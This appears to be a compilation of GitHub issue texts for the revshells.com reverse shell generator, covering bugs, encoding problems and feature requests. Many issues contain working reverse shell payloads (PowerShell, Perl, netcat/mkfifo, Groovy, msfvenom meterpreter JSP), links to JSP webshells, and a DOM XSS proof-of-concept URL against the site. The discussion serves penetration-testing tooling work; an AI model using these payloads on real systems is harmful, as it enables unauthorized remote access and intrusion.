I noticed OS selection preserves the state of the shell selection. Would it be better if the default shell selection matched the target OS's default shell to serve as the initial placeholder?

As shown in the example screenshot, selecting Windows retains /bin/sh (or whatever the previous selection was), as opposed to defaulting to cmd, for instance.

This is a very low-priority issue, but a potential consideration for improvement.

I recommend creating a dedicated section on shell stabilization techniques for the revshells.com website. This would provide users with a one-stop-shop for both reverse shell payloads and shell stabilization techniques, eliminating the need to search for this information elsewhere. The section could include topics such as using terminal multiplexers, creating persistence mechanisms, and upgrading shells to more advanced versions. Thank you for considering this suggestion, as it would make your website an even more valuable resource for the penetration testing and hacking community.

PS C:\Users\Zhentor> $LHOST = "127.0.0.1"; $LPORT = 8080; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()
New-Object : Exception calling ".ctor" with "2" argument(s): "No connection could be made because the target machine
actively refused it 127.0.0.1:8080"
At line:1 char:51

• ... $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $Netwo ...

•              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  

  • CategoryInfo : InvalidOperation: (:) [New-Object], MethodInvocationException
  • FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewObjectCommand

You cannot call a method on a null-valued expression.
At line:1 char:101

• ... ient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $Strea ...

•                       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  

  • CategoryInfo : InvalidOperation: (:) [], RuntimeException
  • FullyQualifiedErrorId : InvokeMethodOnNull

New-Object : A constructor was not found. Cannot find an appropriate constructor for type IO.StreamReader.
At line:1 char:158

• ... ); $StreamReader = New-Object IO.StreamReader($NetworkStream); $Strea ...

•                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  

  • CategoryInfo : ObjectNotFound: (:) [New-Object], PSArgumentException
  • FullyQualifiedErrorId : CannotFindAppropriateCtor,Microsoft.PowerShell.Commands.NewObjectCommand

New-Object : A constructor was not found. Cannot find an appropriate constructor for type IO.StreamWriter.
At line:1 char:218

• ... ); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $Strea ...

•                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  

  • CategoryInfo : ObjectNotFound: (:) [New-Object], PSArgumentException
  • FullyQualifiedErrorId : CannotFindAppropriateCtor,Microsoft.PowerShell.Commands.NewObjectCommand

The property 'AutoFlush' cannot be found on this object. Verify that the property exists and can be set.
At line:1 char:262

• ... StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffe ...

•                               ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  

  • CategoryInfo : InvalidOperation: (:) [], RuntimeException
  • FullyQualifiedErrorId : PropertyNotFound

You cannot call a method on a null-valued expression.
At line:1 char:704

• ... ter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $Netwo ...

•                                            ~~~~~~~~~~~~~~~~~~
  

  • CategoryInfo : InvalidOperation: (:) [], RuntimeException
  • FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.
At line:1 char:724

• ... $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $Strea ...

•                                        ~~~~~~~~~~~~~~~~~~~~~~
  

  • CategoryInfo : InvalidOperation: (:) [], RuntimeException
  • FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.
At line:1 char:748

• ... Client.Close(); $NetworkStream.Close(); $StreamReader.Close(); $Strea ...

•                                         ~~~~~~~~~~~~~~~~~~~~~
  

  • CategoryInfo : InvalidOperation: (:) [], RuntimeException
  • FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.
At line:1 char:771

• ... $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()

•                                                 ~~~~~~~~~~~~~~~~~~~~~
  

  • CategoryInfo : InvalidOperation: (:) [], RuntimeException
  • FullyQualifiedErrorId : InvokeMethodOnNull

PS C:\Users\Zhentor>

heres powershell 1 method maybe you can read it and get me an answer and my kali listens to the same port but no connection

There is an issue while rendering the website in mobile devices. The content gets overflowed outside div.

• https://github.com/tennc/webshell/blob/master/jsp/jsp-reverse.jsp
• https://github.com/LaiKash/JSP-Reverse-and-Web-Shell/blob/main/shell.jsp (2 way : web + rev)
• msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=443 -f jsp -o ./rev.jsp

When selecting the "perl no sh" payload, the IP is not parsed properly.

Result:
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"80:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Expected result:
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"127.0.0.1:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

It would be great to add a listener option for "ncat.exe"

I use this because with WSL, I prefer to call the windows netcat executable directly from linux, and this is the simpliest way to do that. It ensures that the windows machine binds to that port and you don't have to worry about NAT from inside the WSL instance.

Otherwise, there could be a check box that adds the ".exe" to the command which would apply to all the different listeners.

Generating a Bash -i reverse shell with no encoding functions as expected.

Updating the generator to encode output in Base64 appears to function as expected.

Decoding the Base64-encoded string shows the user input parameters were not correctly passed to the Base64 encoding function.

Sometimes this get stuck for weird reason:

Don't know why...
Any help?

Hey,

when I try to generate the raw view of that payload PowerShell #3 (Base64) I get an error Invocation Failed.

Here the link:
https://www.revshells.com/PowerShell%20%233%20(Base64)?ip=10.10.16.2&port=1337&shell=sh&encoding=sh

It would be great if the "Listener" card could list commands to connect to a shell depending on the type of shell being used.
I imagined that it could change it's content whenever a user selects a type of shell, but dedicated tabs/menus to navigate the connection options could work too.

Hi,
Please add this PowerShell reverse shell as it's better than all the ones included:
https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3

$client = New-Object System.Net.Sockets.TCPClient('IP',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

The PowerShell #3 (Base64) generates an invalid Base64 string and doesn't work when running it in Windows. This is the error seen when attempting to run the command in Windows 10.

At line:1 char:1
+ 挤楬湥⁴‽敎⵷扏敪瑣匠獹整⹭敎⹴潓正瑥⹳䍔䍐楬湥⡴ㄢ㈷㌮⸱㈱⸰∸㐬〰⤰␻瑳敲浡㴠␠汣敩瑮䜮瑥瑓敲浡⤨嬻祢整嵛⑝祢整⁳‽⸰㘮㔵㔳╼笥細眻楨敬 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent

The string should be converted to UTF-16LE prior to encoding to Base64. In Linux, this can be done with the command echo -n "whoami" | iconv -f UTF-8 -t UTF-16LE .

I built from latest version

this is my docker-compose :

version: '3'
services:
  revshells:
    image: reverse_shell_generator:latest
    container_name: revshells
    ports:
      - "7778:80"
    restart: always
    volumes:
      - /directory_for_container/:/revshells/

1. can't copy i get this error message
   

2. Downloading opens new window to save then nothing happens

3. Opening in RAW isn't working either
   

C, PHP cmd and some reverse shells don't work properly in raw page:

Expected (C reverse shell):

Result (raw page):

The same occurs with other shells...

By compiling with cl, I get payload.c(23): error C2198: 'strcpy_s': too few arguments for call

There is no sh in native Windows :)

Was watching IppSec's video walkthrough of Nibbles from app.hackthebox.com and noticed that the ncat udp reverse shell used in this repo didn't work, while the one from pentestmonkey.org did.

This works
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 4444 >/tmp/f

While these two did not

ncat mkfifo
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.3 4444 >/tmp/f

ncat udp
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|ncat -u 10.10.14.3 4444 >/tmp/f

Basically seems to be the diff between sh and /bin/sh

Maybe the generator could use some more flavor options?

On the website, the windows reverse shell is a copy of the linux one, just /bin/bash is replaced with cmd. It can't work for two reasons :

• Windows sockets cannot be created in the linux way
• the following code will error :

dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);

Because on windows, socket are not valid file descriptors.
If you want a windows C reverse shell, I advise you this one

For msfvenom, the command for "Python Stageless Reverse TCP" is :
"command": "msfvenom -p cmd/unix/reverse_python LHOST={ip} LPORT={port} -f raw -o shell.py",
this commande make a "shell.py" but cmd/unix/... is design for generate shell commands

└─# msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=4444 -f raw -o shell.py 
Saved as: shell.py

└─# cat shell.py
python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1w[...]Ip')[0]))"

at execution time as a python script : error

└─$ python shell.py
  File "/home/test/shell.py", line 1
    python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1w[...]Ip')[0]))"
SyntaxError: invalid syntax

at execution time as bash script : well

└─$ /bin/sh shell.py

2 possibles solutions :

• change the payload to python/shell_reverse_tcp
• change the output file name to shell.sh

PS : Thank you very much for this great app

Hi,
A space is added before the IP, resulting in invalid payloads for all bash-based payloads.

needs to be added '$client =' before the 'New-Object System.Net.Sockets.TCP.....' so $client is not declared

Would love to use the project, however, need the MIT license in the project to do so.

Thanks!

When you try to generate a nc.exe revshell. the command input is sometimes wrong. For example, it will output nc.exe -e sh 10.10.10.10 4444 when it should be using nc.exe -e cmd.exe 10.10.10.10 4444.

Add groovy shell compatibility for Windows and Linux by updating the cmd string.
For instance if jenkins was installed on Windows versus Linux, they would be different.

Hi

Some years ago I purchased the domain revshell.download with the intent of doing something similar to this project (which I was unaware existed). The domain is actually newer than this project, hehe 😅.

My registration expires in ~1 year, but if you accept this offer, I can renew it for another 3 years (maybe 5) and then transfer it to you.

Full disclosure: I purchased it in a nice deal at porkbun.com for ~ 4.25/year, if you want to buy it directly when it expires in August.

It's absurd and surely an intentional flaw but the limit on the length of the IP field is the only thing that prevents XSS payloads from running on https://www.revshells.com/.

We really don't want some modified implementation of this to end up as an xsshell (webshell) do we?

With on line mode,the advnced options is blank.
It is the same with another PC.
However,it works on my phone.
I have closed AV system and firewall.

Currently pwncat listener only shows like: python3 -m pwncat -lp [port]

But on windows, we need optional argument -m windows, like pwncat-cs -m windows -lp [port].

No character limit in the IP Address field created the possibility of a self XSS, I will fix this at a future time. If anyone can show impact, I'll fix it immediately :)

P.S: Make sure to blame @AyhamAl-Ali 😂

Once you go NaN, that's it. Clearing cache does not help. Manually entering a port number does not help. Pressing +1 does not help.

Changing portInput through console does not work. (Invoking +1 does work, as in it doesn't throw an error. It still stays at NaN)

Trying to edit the text area through the inspector doesn't work because it's not a text area, it's some weird flexbox fjavascript mess containing a bunch of events.

Changing the ID as such finally unlocked the +- buttons.

Though, it couldn't be changed through console for some reason. Inputting into the port box still didn't work until it was at a value other than NaN.

No, errors, nothing blocked in the network tab. Nothing blocked by uBlock Origin, nothing bugging out in console besides your average CSS. The scrips were simply never triggered. Even if manually invoked through console.

Don't really have any other debugging info, since none of the usual Firefox culprits like ETP seem to have been at play.

sometimes bash -i not good, we have to call the bash command from bash -c
adding bash -c

Hi Team,

I have noticed a security issue in the reverse shell generator.

Issue Description:

An attacker can trigger the XSS vulnerability is the victim machine using the below payload

https://www.revshells.com/?#ip=%3Cimg%20src=x%20onerror=alert(document.domain)%20/%3E

https://www.revshells.com/?#ip=%3Cimg%20src=x%20onerror=alert(document.domain)%20/%3E

Ref: https://portswigger.net/web-security/cross-site-scripting/dom-based

Remediation:

Do not trust the user input. HTML escape the user input before rendering in the DOM.

Thanks,
SRK.

Example:
$shell = 'uname -a; w; id; powershell -i';

powershell -i is not a valid command
same applies to uname -a; w; id; on Windows.

Suggestion: You may use this PHP Reverse shell (which is based on Pentest monkey's one) but, it is also compatible with Windows, Linux and Mac: https://github.com/ivan-sincek/php-reverse-shell

I'm guessing "URLEncode" is meant to perform URL encoding, but currently it doesn't encode any URL-reserved characters at all such as e.g. "&" or "/".

I'm further guessing "Double URLEncode" is meant to perform URL encoding twice, but currently it performs URL encoding once (but unlike "URLEncode" it performs complete URL encoding).

Another relevant issue is that HTML escaping is performed before the URL encoding, causing HTML entities to be URL encoded. E.g., "&" will be HTML escaped to "&" which in turn will be URL encoded to "%26amp%3B", but the expected encoding is "%26".

I suggest these issues are fixed by...

• letting "URLEncode" perform encoding using "encodeURIComponent" (or perhaps the "fixedEncodeURIComponent" described at MDN? Maybe unnecessary),
• letting "Double URLEncode" do the same URL encoding as "URLEncode" but twice, and
• delay HTML-escaping until after URL encoding. If the URL encoding is fixed, then HTML-escaping should be unnecessary. However, it might be good practice to keep the HTML-escaping, but if so then not like it's done in script.js (substring substitution) but instead like it's done in raw-link.js (utilize HTMLElement.innerText or Node.textContent), i.e. leave escaping to the browser.

ignore

Hi 👋

As stated in man page, "-l' Used to specify that nc should listen for an incoming connection rather than initiate a connection to a remote host. It is an error to use this option in conjunction with the -p, -s, or -z options. Additionally, any timeouts specified with the -w option are ignored."

I suggest to remove -p in the command for listener

Cheers

Groovy RSH: Source: https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76#file-revsh-groovy
Add for windows only into data.js

{ 
    "name": "Groovy",
    "command":"String host=\"{ip}\";int port={port};String cmd=\"{shell}\";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();",
    "meta":["windows"]
}